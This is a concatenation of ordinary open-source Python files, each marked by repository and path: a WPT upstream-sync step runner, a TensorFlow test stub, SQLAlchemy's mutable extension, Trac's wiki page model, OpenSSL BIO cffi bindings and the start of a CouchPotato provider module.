for commit in state.source_commits[state.commits_loaded:]:
i = state.commits_loaded + 1
self.logger.info("Moving commit %i: %s" % (i, commit.message.full_summary))
patch = commit.export_patch(state.tests_path)
stripped_patch = rewrite_patch(patch, strip_path)
try:
state.sync_tree.import_patch(stripped_patch)
except:
print patch.diff
raise
state.commits_loaded = i
class RebaseCommits(Step):
"""Rebase commits from the current branch on top of the upstream destination branch.
This step is particularly likely to fail if the rebase generates merge conflicts.
In that case the conflicts can be fixed up locally and the sync process restarted
with --continue.
"""
provides = ["rebased_commits"]
def create(self, state):
self.logger.info("Rebasing local commits")
continue_rebase = False
# Check if there's a rebase in progress
if (os.path.exists(os.path.join(state.sync_tree.root,
".git",
"rebase-merge")) or
os.path.exists(os.path.join(state.sync_tree.root,
".git",
"rebase-apply"))):
continue_rebase = True
try:
state.sync_tree.rebase(state.base_commit, continue_rebase=continue_rebase)
except subprocess.CalledProcessError:
self.logger.info("Rebase failed, fix merge and run %s again with --continue" % sys.argv[0])
raise
state.rebased_commits = state.sync_tree.log(state.base_commit)
self.logger.info("Rebase successful")
class CheckRebase(Step):
"""Check if there are any commits remaining after rebase"""
def create(self, state):
if not state.rebased_commits:
self.logger.info("Nothing to upstream, exiting")
return exit_clean
class MergeUpstream(Step):
"""Run steps to push local commits as seperate PRs and merge upstream."""
provides = ["merge_index", "gh_repo"]
def create(self, state):
gh = GitHub(state.token)
if "merge_index" not in state:
state.merge_index = 0
org, name = urlparse.urlsplit(state.sync["remote_url"]).path[1:].split("/")
if name.endswith(".git"):
name = name[:-4]
state.gh_repo = gh.repo(org, name)
for commit in state.rebased_commits[state.merge_index:]:
with state.push(["gh_repo", "sync_tree"]):
state.commit = commit
pr_merger = PRMergeRunner(self.logger, state)
rv = pr_merger.run()
if rv is not None:
return rv
state.merge_index += 1
class UpdateLastSyncCommit(Step):
"""Update the gecko commit at which we last performed a sync with upstream."""
provides = []
def create(self, state):
self.logger.info("Updating last sync commit")
with open(state.last_sync_path, "w") as f:
f.write(state.local_tree.rev)
# This gets added to the patch later on
class MergeLocalBranch(Step):
"""Create a local branch pointing at the commit to upstream"""
provides = ["local_branch"]
def create(self, state):
branch_prefix = "sync_%s" % state.commit.sha1
local_branch = state.sync_tree.unique_branch_name(branch_prefix)
state.sync_tree.create_branch(local_branch, state.commit)
state.local_branch = local_branch
class MergeRemoteBranch(Step):
"""Get an unused remote branch name to use for the PR"""
provides = ["remote_branch"]
def create(self, state):
remote_branch = "sync_%s" % state.commit.sha1
branches = [ref[len("refs/heads/"):] for sha1, ref in
state.sync_tree.list_remote(state.gh_repo.url)
if ref.startswith("refs/heads")]
state.remote_branch = get_unique_name(branches, remote_branch)
class PushUpstream(Step):
"""Push local branch to remote"""
def create(self, state):
self.logger.info("Pushing commit upstream")
state.sync_tree.push(state.gh_repo.url,
state.local_branch,
state.remote_branch)
class CreatePR(Step):
"""Create a PR for the remote branch"""
provides = ["pr"]
def create(self, state):
self.logger.info("Creating a PR")
commit = state.commit
state.pr = state.gh_repo.create_pr(commit.message.full_summary,
state.remote_branch,
"master",
commit.message.body if commit.message.body else "")
class PRAddComment(Step):
"""Add an issue comment indicating that the code has been reviewed already"""
def create(self, state):
state.pr.issue.add_comment("Code reviewed upstream.")
class MergePR(Step):
"""Merge the PR"""
def create(self, state):
self.logger.info("Merging PR")
state.pr.merge()
class PRDeleteBranch(Step):
"""Delete the remote branch"""
def create(self, state):
self.logger.info("Deleting remote branch")
state.sync_tree.push(state.gh_repo.url, "", state.remote_branch)
class SyncToUpstreamRunner(StepRunner):
"""Runner for syncing local changes to upstream"""
steps = [LoadManifest,
CheckoutBranch,
GetLastSyncCommit,
GetBaseCommit,
LoadCommits,
SelectCommits,
MovePatches,
RebaseCommits,
CheckRebase,
MergeUpstream,
UpdateLastSyncCommit]
class PRMergeRunner(StepRunner):
"""(Sub)Runner for creating and merging a PR"""
steps = [
MergeLocalBranch,
MergeRemoteBranch,
PushUpstream,
CreatePR,
PRAddComment,
MergePR,
PRDeleteBranch,
]
|
petewarden/tensorflow | refs/heads/master | tensorflow/python/kernel_tests/bias_op_test.py | 20 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for BiasAdd."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.kernel_tests import bias_op_base
from tensorflow.python.platform import test
BiasAddTest = bias_op_base.BiasAddTestBase
if __name__ == "__main__":
test.main()
|
xuru/restler | refs/heads/master | lib/usr/sqlalchemy/ext/mutable.py | 2 | # ext/mutable.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Provide support for tracking of in-place changes to scalar values,
which are propagated into ORM change events on owning parent objects.
The :mod:`sqlalchemy.ext.mutable` extension replaces SQLAlchemy's legacy approach to in-place
mutations of scalar values, established by the :class:`.types.MutableType`
class as well as the ``mutable=True`` type flag, with a system that allows
change events to be propagated from the value to the owning parent, thereby
removing the need for the ORM to maintain copies of values as well as the very
expensive requirement of scanning through all "mutable" values on each flush
call, looking for changes.
.. _mutable_scalars:
Establishing Mutability on Scalar Column Values
===============================================
A typical example of a "mutable" structure is a Python dictionary.
Following the example introduced in :ref:`types_toplevel`, we
begin with a custom type that marshals Python dictionaries into
JSON strings before being persisted::
from sqlalchemy.types import TypeDecorator, VARCHAR
import json
class JSONEncodedDict(TypeDecorator):
"Represents an immutable structure as a json-encoded string."
impl = VARCHAR
def process_bind_param(self, value, dialect):
if value is not None:
value = json.dumps(value)
return value
def process_result_value(self, value, dialect):
if value is not None:
value = json.loads(value)
return value
The usage of ``json`` is only for the purposes of example. The :mod:`sqlalchemy.ext.mutable`
extension can be used
with any type whose target Python type may be mutable, including
:class:`.PickleType`, :class:`.postgresql.ARRAY`, etc.
When using the :mod:`sqlalchemy.ext.mutable` extension, the value itself
tracks all parents which reference it. Here we will replace the usage
of plain Python dictionaries with a dict subclass that implements
the :class:`.Mutable` mixin::
import collections
from sqlalchemy.ext.mutable import Mutable
class MutationDict(Mutable, dict):
@classmethod
def coerce(cls, key, value):
"Convert plain dictionaries to MutationDict."
if not isinstance(value, MutationDict):
if isinstance(value, dict):
return MutationDict(value)
# this call will raise ValueError
return Mutable.coerce(key, value)
else:
return value
def __setitem__(self, key, value):
"Detect dictionary set events and emit change events."
dict.__setitem__(self, key, value)
self.changed()
def __delitem__(self, key):
"Detect dictionary del events and emit change events."
dict.__delitem__(self, key)
self.changed()
The above dictionary class takes the approach of subclassing the Python
built-in ``dict`` to produce a dict
subclass which routes all mutation events through ``__setitem__``. There are
many variants on this approach, such as subclassing ``UserDict.UserDict``,
the newer ``collections.MutableMapping``, etc. The part that's important to this
example is that the :meth:`.Mutable.changed` method is called whenever an in-place change to the
datastructure takes place.
We also redefine the :meth:`.Mutable.coerce` method which will be used to
convert any values that are not instances of ``MutationDict``, such
as the plain dictionaries returned by the ``json`` module, into the
appropriate type. Defining this method is optional; we could just as well created our
``JSONEncodedDict`` such that it always returns an instance of ``MutationDict``,
and additionally ensured that all calling code uses ``MutationDict``
explicitly. When :meth:`.Mutable.coerce` is not overridden, any values
applied to a parent object which are not instances of the mutable type
will raise a ``ValueError``.
Our new ``MutationDict`` type offers a class method
:meth:`~.Mutable.as_mutable` which we can use within column metadata
to associate with types. This method grabs the given type object or
class and associates a listener that will detect all future mappings
of this type, applying event listening instrumentation to the mapped
attribute. Such as, with classical table metadata::
from sqlalchemy import Table, Column, Integer
my_data = Table('my_data', metadata,
Column('id', Integer, primary_key=True),
Column('data', MutationDict.as_mutable(JSONEncodedDict))
)
Above, :meth:`~.Mutable.as_mutable` returns an instance of ``JSONEncodedDict``
(if the type object was not an instance already), which will intercept any
attributes which are mapped against this type. Below we establish a simple
mapping against the ``my_data`` table::
from sqlalchemy import mapper
class MyDataClass(object):
pass
# associates mutation listeners with MyDataClass.data
mapper(MyDataClass, my_data)
The ``MyDataClass.data`` member will now be notified of in place changes
to its value.
There's no difference in usage when using declarative::
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class MyDataClass(Base):
__tablename__ = 'my_data'
id = Column(Integer, primary_key=True)
data = Column(MutationDict.as_mutable(JSONEncodedDict))
Any in-place changes to the ``MyDataClass.data`` member
will flag the attribute as "dirty" on the parent object::
>>> from sqlalchemy.orm import Session
>>> sess = Session()
>>> m1 = MyDataClass(data={'value1':'foo'})
>>> sess.add(m1)
>>> sess.commit()
>>> m1.data['value1'] = 'bar'
>>> assert m1 in sess.dirty
True
The ``MutationDict`` can be associated with all future instances
of ``JSONEncodedDict`` in one step, using :meth:`~.Mutable.associate_with`. This
is similar to :meth:`~.Mutable.as_mutable` except it will intercept
all occurrences of ``MutationDict`` in all mappings unconditionally, without
the need to declare it individually::
MutationDict.associate_with(JSONEncodedDict)
class MyDataClass(Base):
__tablename__ = 'my_data'
id = Column(Integer, primary_key=True)
data = Column(JSONEncodedDict)
Supporting Pickling
--------------------
The key to the :mod:`sqlalchemy.ext.mutable` extension relies upon the
placement of a ``weakref.WeakKeyDictionary`` upon the value object, which
stores a mapping of parent mapped objects keyed to the attribute name under
which they are associated with this value. ``WeakKeyDictionary`` objects are
not picklable, due to the fact that they contain weakrefs and function
callbacks. In our case, this is a good thing, since if this dictionary were
picklable, it could lead to an excessively large pickle size for our value
objects that are pickled by themselves outside of the context of the parent.
The developer responsibility here is only to provide a ``__getstate__`` method
that excludes the :meth:`~.MutableBase._parents` collection from the pickle
stream::
class MyMutableType(Mutable):
def __getstate__(self):
d = self.__dict__.copy()
d.pop('_parents', None)
return d
With our dictionary example, we need to return the contents of the dict itself
(and also restore them on __setstate__)::
class MutationDict(Mutable, dict):
# ....
def __getstate__(self):
return dict(self)
def __setstate__(self, state):
self.update(state)
In the case that our mutable value object is pickled as it is attached to one
or more parent objects that are also part of the pickle, the :class:`.Mutable`
mixin will re-establish the :attr:`.Mutable._parents` collection on each value
object as the owning parents themselves are unpickled.
.. _mutable_composites:
Establishing Mutability on Composites
=====================================
Composites are a special ORM feature which allow a single scalar attribute to
be assigned an object value which represents information "composed" from one
or more columns from the underlying mapped table. The usual example is that of
a geometric "point", and is introduced in :ref:`mapper_composite`.
.. versionchanged:: 0.7
The internals of :func:`.orm.composite` have been
greatly simplified and in-place mutation detection is no longer enabled by
default; instead, the user-defined value must detect changes on its own and
propagate them to all owning parents. The :mod:`sqlalchemy.ext.mutable`
extension provides the helper class :class:`.MutableComposite`, which is a
slight variant on the :class:`.Mutable` class.
As is the case with :class:`.Mutable`, the user-defined composite class
subclasses :class:`.MutableComposite` as a mixin, and detects and delivers
change events to its parents via the :meth:`.MutableComposite.changed` method.
In the case of a composite class, the detection is usually via the usage of
Python descriptors (i.e. ``@property``), or alternatively via the special
Python method ``__setattr__()``. Below we expand upon the ``Point`` class
introduced in :ref:`mapper_composite` to subclass :class:`.MutableComposite`
and to also route attribute set events via ``__setattr__`` to the
:meth:`.MutableComposite.changed` method::
from sqlalchemy.ext.mutable import MutableComposite
class Point(MutableComposite):
def __init__(self, x, y):
self.x = x
self.y = y
def __setattr__(self, key, value):
"Intercept set events"
# set the attribute
object.__setattr__(self, key, value)
# alert all parents to the change
self.changed()
def __composite_values__(self):
return self.x, self.y
def __eq__(self, other):
return isinstance(other, Point) and \\
other.x == self.x and \\
other.y == self.y
def __ne__(self, other):
return not self.__eq__(other)
The :class:`.MutableComposite` class uses a Python metaclass to automatically
establish listeners for any usage of :func:`.orm.composite` that specifies our
``Point`` type. Below, when ``Point`` is mapped to the ``Vertex`` class,
listeners are established which will route change events from ``Point``
objects to each of the ``Vertex.start`` and ``Vertex.end`` attributes::
from sqlalchemy.orm import composite, mapper
from sqlalchemy import Table, Column
vertices = Table('vertices', metadata,
Column('id', Integer, primary_key=True),
Column('x1', Integer),
Column('y1', Integer),
Column('x2', Integer),
Column('y2', Integer),
)
class Vertex(object):
pass
mapper(Vertex, vertices, properties={
'start': composite(Point, vertices.c.x1, vertices.c.y1),
'end': composite(Point, vertices.c.x2, vertices.c.y2)
})
Any in-place changes to the ``Vertex.start`` or ``Vertex.end`` members
will flag the attribute as "dirty" on the parent object::
>>> from sqlalchemy.orm import Session
>>> sess = Session()
>>> v1 = Vertex(start=Point(3, 4), end=Point(12, 15))
>>> sess.add(v1)
>>> sess.commit()
>>> v1.end.x = 8
>>> assert v1 in sess.dirty
True
Supporting Pickling
--------------------
As is the case with :class:`.Mutable`, the :class:`.MutableComposite` helper
class uses a ``weakref.WeakKeyDictionary`` available via the
:meth:`.MutableBase._parents` attribute which isn't picklable. If we need to
pickle instances of ``Point`` or its owning class ``Vertex``, we at least need
to define a ``__getstate__`` that doesn't include the ``_parents`` dictionary.
Below we define both a ``__getstate__`` and a ``__setstate__`` that package up
the minimal form of our ``Point`` class::
class Point(MutableComposite):
# ...
def __getstate__(self):
return self.x, self.y
def __setstate__(self, state):
self.x, self.y = state
As with :class:`.Mutable`, the :class:`.MutableComposite` augments the
pickling process of the parent's object-relational state so that the
:meth:`.MutableBase._parents` collection is restored to all ``Point`` objects.
"""
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy import event, types
from sqlalchemy.orm import mapper, object_mapper
from sqlalchemy.util import memoized_property
import weakref
class MutableBase(object):
"""Common base class to :class:`.Mutable` and :class:`.MutableComposite`."""
@memoized_property
def _parents(self):
"""Dictionary of parent object->attribute name on the parent.
This attribute is a so-called "memoized" property. It initializes
itself with a new ``weakref.WeakKeyDictionary`` the first time
it is accessed, returning the same object upon subsequent access.
"""
return weakref.WeakKeyDictionary()
@classmethod
def coerce(cls, key, value):
"""Given a value, coerce it into this type.
By default raises ValueError.
"""
if value is None:
return None
raise ValueError("Attribute '%s' does not accept objects of type %s" % (key, type(value)))
@classmethod
def _listen_on_attribute(cls, attribute, coerce, parent_cls):
"""Establish this type as a mutation listener for the given
mapped descriptor.
"""
key = attribute.key
if parent_cls is not attribute.class_:
return
# rely on "propagate" here
parent_cls = attribute.class_
def load(state, *args):
"""Listen for objects loaded or refreshed.
Wrap the target data member's value with
``Mutable``.
"""
val = state.dict.get(key, None)
if val is not None:
if coerce:
val = cls.coerce(key, val)
state.dict[key] = val
val._parents[state.obj()] = key
def set(target, value, oldvalue, initiator):
"""Listen for set/replace events on the target
data member.
Establish a weak reference to the parent object
on the incoming value, remove it for the one
outgoing.
"""
if not isinstance(value, cls):
value = cls.coerce(key, value)
if value is not None:
value._parents[target.obj()] = key
if isinstance(oldvalue, cls):
oldvalue._parents.pop(target.obj(), None)
return value
def pickle(state, state_dict):
val = state.dict.get(key, None)
if val is not None:
if 'ext.mutable.values' not in state_dict:
state_dict['ext.mutable.values'] = []
state_dict['ext.mutable.values'].append(val)
def unpickle(state, state_dict):
if 'ext.mutable.values' in state_dict:
for val in state_dict['ext.mutable.values']:
val._parents[state.obj()] = key
event.listen(parent_cls, 'load', load, raw=True, propagate=True)
event.listen(parent_cls, 'refresh', load, raw=True, propagate=True)
event.listen(attribute, 'set', set, raw=True, retval=True, propagate=True)
event.listen(parent_cls, 'pickle', pickle, raw=True, propagate=True)
event.listen(parent_cls, 'unpickle', unpickle, raw=True, propagate=True)
class Mutable(MutableBase):
"""Mixin that defines transparent propagation of change
events to a parent object.
See the example in :ref:`mutable_scalars` for usage information.
"""
def changed(self):
"""Subclasses should call this method whenever change events occur."""
for parent, key in self._parents.items():
flag_modified(parent, key)
@classmethod
def associate_with_attribute(cls, attribute):
"""Establish this type as a mutation listener for the given
mapped descriptor.
"""
cls._listen_on_attribute(attribute, True, attribute.class_)
@classmethod
def associate_with(cls, sqltype):
"""Associate this wrapper with all future mapped columns
of the given type.
This is a convenience method that calls ``associate_with_attribute`` automatically.
.. warning::
The listeners established by this method are *global*
to all mappers, and are *not* garbage collected. Only use
:meth:`.associate_with` for types that are permanent to an application,
not with ad-hoc types else this will cause unbounded growth
in memory usage.
"""
def listen_for_type(mapper, class_):
for prop in mapper.iterate_properties:
if hasattr(prop, 'columns'):
if isinstance(prop.columns[0].type, sqltype):
cls.associate_with_attribute(getattr(class_, prop.key))
event.listen(mapper, 'mapper_configured', listen_for_type)
@classmethod
def as_mutable(cls, sqltype):
"""Associate a SQL type with this mutable Python type.
This establishes listeners that will detect ORM mappings against
the given type, adding mutation event trackers to those mappings.
The type is returned, unconditionally as an instance, so that
:meth:`.as_mutable` can be used inline::
Table('mytable', metadata,
Column('id', Integer, primary_key=True),
Column('data', MyMutableType.as_mutable(PickleType))
)
Note that the returned type is always an instance, even if a class
is given, and that only columns which are declared specifically with that
type instance receive additional instrumentation.
To associate a particular mutable type with all occurrences of a
particular type, use the :meth:`.Mutable.associate_with` classmethod
of the particular :meth:`.Mutable` subclass to establish a global
association.
.. warning::
The listeners established by this method are *global*
to all mappers, and are *not* garbage collected. Only use
:meth:`.as_mutable` for types that are permanent to an application,
not with ad-hoc types else this will cause unbounded growth
in memory usage.
"""
sqltype = types.to_instance(sqltype)
def listen_for_type(mapper, class_):
for prop in mapper.iterate_properties:
if hasattr(prop, 'columns'):
if prop.columns[0].type is sqltype:
cls.associate_with_attribute(getattr(class_, prop.key))
event.listen(mapper, 'mapper_configured', listen_for_type)
return sqltype
class _MutableCompositeMeta(type):
def __init__(cls, classname, bases, dict_):
cls._setup_listeners()
return type.__init__(cls, classname, bases, dict_)
class MutableComposite(MutableBase):
"""Mixin that defines transparent propagation of change
events on a SQLAlchemy "composite" object to its
owning parent or parents.
See the example in :ref:`mutable_composites` for usage information.
.. warning::
The listeners established by the :class:`.MutableComposite`
class are *global* to all mappers, and are *not* garbage collected. Only use
:class:`.MutableComposite` for types that are permanent to an application,
not with ad-hoc types else this will cause unbounded growth
in memory usage.
"""
__metaclass__ = _MutableCompositeMeta
def changed(self):
"""Subclasses should call this method whenever change events occur."""
for parent, key in self._parents.items():
prop = object_mapper(parent).get_property(key)
for value, attr_name in zip(
self.__composite_values__(),
prop._attribute_keys):
setattr(parent, attr_name, value)
@classmethod
def _setup_listeners(cls):
"""Associate this wrapper with all future mapped composites
of the given type.
This is a convenience method that calls ``associate_with_attribute`` automatically.
"""
def listen_for_type(mapper, class_):
for prop in mapper.iterate_properties:
if hasattr(prop, 'composite_class') and issubclass(prop.composite_class, cls):
cls._listen_on_attribute(getattr(class_, prop.key), False, class_)
event.listen(mapper, 'mapper_configured', listen_for_type)
|
netjunki/trac-Pygit2 | refs/heads/mergewithbeta1.0 | trac/wiki/model.py | 3 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2003-2009 Edgewall Software
# Copyright (C) 2003-2005 Jonas Borgström <jonas@edgewall.com>
# Copyright (C) 2005 Christopher Lenz <cmlenz@gmx.de>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
#
# Author: Jonas Borgström <jonas@edgewall.com>
# Christopher Lenz <cmlenz@gmx.de>
from __future__ import with_statement
from datetime import datetime
from trac.core import *
from trac.resource import Resource
from trac.util.datefmt import from_utimestamp, to_utimestamp, utc
from trac.util.translation import _
from trac.wiki.api import WikiSystem, validate_page_name
class WikiPage(object):
"""Represents a wiki page (new or existing)."""
realm = 'wiki'
def __init__(self, env, name=None, version=None, db=None):
self.env = env
if isinstance(name, Resource):
self.resource = name
name = self.resource.id
else:
if version:
version = int(version) # must be a number or None
self.resource = Resource('wiki', name, version)
self.name = name
if name:
self._fetch(name, version, db)
else:
self.version = 0
self.text = self.comment = self.author = ''
self.time = None
self.readonly = 0
self.old_text = self.text
self.old_readonly = self.readonly
def _fetch(self, name, version=None, db=None):
if version is not None:
sql = """SELECT version, time, author, text, comment, readonly
FROM wiki WHERE name=%s AND version=%s"""
args = (name, int(version))
else:
sql = """SELECT version, time, author, text, comment, readonly
FROM wiki WHERE name=%s ORDER BY version DESC LIMIT 1"""
args = (name,)
for version, time, author, text, comment, readonly in \
self.env.db_query(sql, args):
self.version = int(version)
self.author = author
self.time = from_utimestamp(time)
self.text = text
self.comment = comment
self.readonly = int(readonly) if readonly else 0
break
else:
self.version = 0
self.text = self.comment = self.author = ''
self.time = None
self.readonly = 0
exists = property(lambda self: self.version > 0)
def delete(self, version=None, db=None):
"""Delete one or all versions of a page.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot delete non-existent page"
with self.env.db_transaction as db:
if version is None:
# Delete a wiki page completely
db("DELETE FROM wiki WHERE name=%s", (self.name,))
self.env.log.info("Deleted page %s", self.name)
else:
# Delete only a specific page version
db("DELETE FROM wiki WHERE name=%s and version=%s",
(self.name, version))
self.env.log.info("Deleted version %d of page %s", version,
self.name)
if version is None or version == self.version:
self._fetch(self.name, None)
if not self.exists:
# Invalidate page name cache
del WikiSystem(self.env).pages
# Delete orphaned attachments
from trac.attachment import Attachment
Attachment.delete_all(self.env, 'wiki', self.name)
# Let change listeners know about the deletion
if not self.exists:
for listener in WikiSystem(self.env).change_listeners:
listener.wiki_page_deleted(self)
else:
for listener in WikiSystem(self.env).change_listeners:
if hasattr(listener, 'wiki_page_version_deleted'):
listener.wiki_page_version_deleted(self)
def save(self, author, comment, remote_addr, t=None, db=None):
"""Save a new version of a page.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
if not validate_page_name(self.name):
raise TracError(_("Invalid Wiki page name '%(name)s'",
name=self.name))
new_text = self.text != self.old_text
if not new_text and self.readonly == self.old_readonly:
raise TracError(_("Page not modified"))
t = t or datetime.now(utc)
with self.env.db_transaction as db:
if new_text:
db("""INSERT INTO wiki (name, version, time, author, ipnr,
text, comment, readonly)
VALUES (%s,%s,%s,%s,%s,%s,%s,%s)
""", (self.name, self.version + 1, to_utimestamp(t),
author, remote_addr, self.text, comment,
self.readonly))
self.version += 1
self.resource = self.resource(version=self.version)
else:
db("UPDATE wiki SET readonly=%s WHERE name=%s",
(self.readonly, self.name))
if self.version == 1:
# Invalidate page name cache
del WikiSystem(self.env).pages
self.author = author
self.comment = comment
self.time = t
for listener in WikiSystem(self.env).change_listeners:
if self.version == 1:
listener.wiki_page_added(self)
else:
listener.wiki_page_changed(self, self.version, t, comment,
author, remote_addr)
self.old_readonly = self.readonly
self.old_text = self.text
def rename(self, new_name):
"""Rename wiki page in-place, keeping the history intact.
Renaming a page this way will eventually leave dangling references
to the old page - which litterally doesn't exist anymore.
"""
assert self.exists, "Cannot rename non-existent page"
if not validate_page_name(new_name):
raise TracError(_("Invalid Wiki page name '%(name)s'",
name=new_name))
old_name = self.name
with self.env.db_transaction as db:
new_page = WikiPage(self.env, new_name)
if new_page.exists:
raise TracError(_("Can't rename to existing %(name)s page.",
name=new_name))
db("UPDATE wiki SET name=%s WHERE name=%s", (new_name, old_name))
# Invalidate page name cache
del WikiSystem(self.env).pages
# Reparent attachments
from trac.attachment import Attachment
Attachment.reparent_all(self.env, 'wiki', old_name, 'wiki',
new_name)
self.name = new_name
self.env.log.info('Renamed page %s to %s', old_name, new_name)
for listener in WikiSystem(self.env).change_listeners:
if hasattr(listener, 'wiki_page_renamed'):
listener.wiki_page_renamed(self, old_name)
def get_history(self, db=None):
"""Retrieve the edit history of a wiki page.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
for version, ts, author, comment, ipnr in self.env.db_query("""
SELECT version, time, author, comment, ipnr FROM wiki
WHERE name=%s AND version<=%s ORDER BY version DESC
""", (self.name, self.version)):
yield version, from_utimestamp(ts), author, comment, ipnr
|
jjmleiro/hue | refs/heads/master | desktop/core/ext-py/cryptography-1.3.1/src/_cffi_src/openssl/bio.py | 7 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/bio.h>
"""
TYPES = """
typedef struct bio_st BIO;
typedef void bio_info_cb(BIO *, int, const char *, int, long, long);
struct bio_method_st {
int type;
const char *name;
int (*bwrite)(BIO *, const char *, int);
int (*bread)(BIO *, char *, int);
int (*bputs)(BIO *, const char *);
int (*bgets)(BIO *, char *, int);
long (*ctrl)(BIO *, int, long, void *);
int (*create)(BIO *);
int (*destroy)(BIO *);
long (*callback_ctrl)(BIO *, int, bio_info_cb *);
...;
};
typedef struct bio_method_st BIO_METHOD;
struct bio_st {
BIO_METHOD *method;
long (*callback)(struct bio_st *, int, const char *, int, long, long);
char *cb_arg;
int init;
int shutdown;
int flags;
int retry_reason;
int num;
void *ptr;
struct bio_st *next_bio;
struct bio_st *prev_bio;
int references;
unsigned long num_read;
unsigned long num_write;
...;
};
typedef ... BUF_MEM;
static const int BIO_TYPE_MEM;
static const int BIO_TYPE_FILE;
static const int BIO_TYPE_FD;
static const int BIO_TYPE_SOCKET;
static const int BIO_TYPE_CONNECT;
static const int BIO_TYPE_ACCEPT;
static const int BIO_TYPE_NULL;
static const int BIO_CLOSE;
static const int BIO_NOCLOSE;
static const int BIO_TYPE_SOURCE_SINK;
static const int BIO_CTRL_RESET;
static const int BIO_CTRL_EOF;
static const int BIO_CTRL_SET;
static const int BIO_CTRL_SET_CLOSE;
static const int BIO_CTRL_FLUSH;
static const int BIO_CTRL_DUP;
static const int BIO_CTRL_GET_CLOSE;
static const int BIO_CTRL_INFO;
static const int BIO_CTRL_GET;
static const int BIO_CTRL_PENDING;
static const int BIO_CTRL_WPENDING;
static const int BIO_C_FILE_SEEK;
static const int BIO_C_FILE_TELL;
static const int BIO_TYPE_NONE;
static const int BIO_TYPE_NBIO_TEST;
static const int BIO_TYPE_BER;
static const int BIO_TYPE_BIO;
static const int BIO_TYPE_DESCRIPTOR;
static const int BIO_FLAGS_READ;
static const int BIO_FLAGS_WRITE;
static const int BIO_FLAGS_IO_SPECIAL;
static const int BIO_FLAGS_RWS;
static const int BIO_FLAGS_SHOULD_RETRY;
static const int BIO_TYPE_NULL_FILTER;
static const int BIO_TYPE_SSL;
static const int BIO_TYPE_MD;
static const int BIO_TYPE_BUFFER;
static const int BIO_TYPE_CIPHER;
static const int BIO_TYPE_BASE64;
static const int BIO_TYPE_FILTER;
"""
FUNCTIONS = """
BIO *BIO_new(BIO_METHOD *);
int BIO_set(BIO *, BIO_METHOD *);
int BIO_free(BIO *);
void BIO_vfree(BIO *);
void BIO_free_all(BIO *);
BIO *BIO_push(BIO *, BIO *);
BIO *BIO_pop(BIO *);
BIO *BIO_next(BIO *);
BIO *BIO_find_type(BIO *, int);
BIO_METHOD *BIO_s_mem(void);
BIO_METHOD *BIO_s_file(void);
BIO *BIO_new_file(const char *, const char *);
BIO *BIO_new_fp(FILE *, int);
BIO_METHOD *BIO_s_fd(void);
BIO *BIO_new_fd(int, int);
BIO_METHOD *BIO_s_socket(void);
BIO *BIO_new_socket(int, int);
BIO_METHOD *BIO_s_null(void);
long BIO_ctrl(BIO *, int, long, void *);
long BIO_callback_ctrl(
BIO *,
int,
void (*)(struct bio_st *, int, const char *, int, long, long)
);
long BIO_int_ctrl(BIO *, int, long, int);
size_t BIO_ctrl_pending(BIO *);
size_t BIO_ctrl_wpending(BIO *);
int BIO_read(BIO *, void *, int);
int BIO_gets(BIO *, char *, int);
int BIO_write(BIO *, const void *, int);
int BIO_puts(BIO *, const char *);
BIO_METHOD *BIO_f_null(void);
BIO_METHOD *BIO_f_buffer(void);
"""
MACROS = """
/* BIO_new_mem_buf became const void * in 1.0.2g */
BIO *BIO_new_mem_buf(void *, int);
long BIO_set_fd(BIO *, long, int);
long BIO_get_fd(BIO *, char *);
long BIO_set_mem_eof_return(BIO *, int);
long BIO_get_mem_data(BIO *, char **);
long BIO_set_mem_buf(BIO *, BUF_MEM *, int);
long BIO_get_mem_ptr(BIO *, BUF_MEM **);
long BIO_set_fp(BIO *, FILE *, int);
long BIO_get_fp(BIO *, FILE **);
long BIO_read_filename(BIO *, char *);
long BIO_write_filename(BIO *, char *);
long BIO_append_filename(BIO *, char *);
long BIO_rw_filename(BIO *, char *);
int BIO_should_read(BIO *);
int BIO_should_write(BIO *);
int BIO_should_io_special(BIO *);
int BIO_retry_type(BIO *);
int BIO_should_retry(BIO *);
int BIO_reset(BIO *);
int BIO_seek(BIO *, int);
int BIO_tell(BIO *);
int BIO_flush(BIO *);
int BIO_eof(BIO *);
int BIO_set_close(BIO *,long);
int BIO_get_close(BIO *);
int BIO_pending(BIO *);
int BIO_wpending(BIO *);
int BIO_get_info_callback(BIO *, bio_info_cb **);
int BIO_set_info_callback(BIO *, bio_info_cb *);
long BIO_get_buffer_num_lines(BIO *);
long BIO_set_read_buffer_size(BIO *, long);
long BIO_set_write_buffer_size(BIO *, long);
long BIO_set_buffer_size(BIO *, long);
long BIO_set_buffer_read_data(BIO *, void *, long);
/* The following was a macro in 0.9.8e. Once we drop support for RHEL/CentOS 5
we should move this back to FUNCTIONS. */
int BIO_method_type(const BIO *);
"""
CUSTOMIZATIONS = """
"""
|
darren-rogan/CouchPotatoServer | refs/heads/master | couchpotato/core/providers/movie/themoviedb/main.py | 2 | from couchpotato.core.event import addEvent
from couchpotato.core.helpers.encoding import simplifyString, toUnicode
from couchpotato.core.logger import CPLog
from couchpotato.core.providers.movie.base import MovieProvider
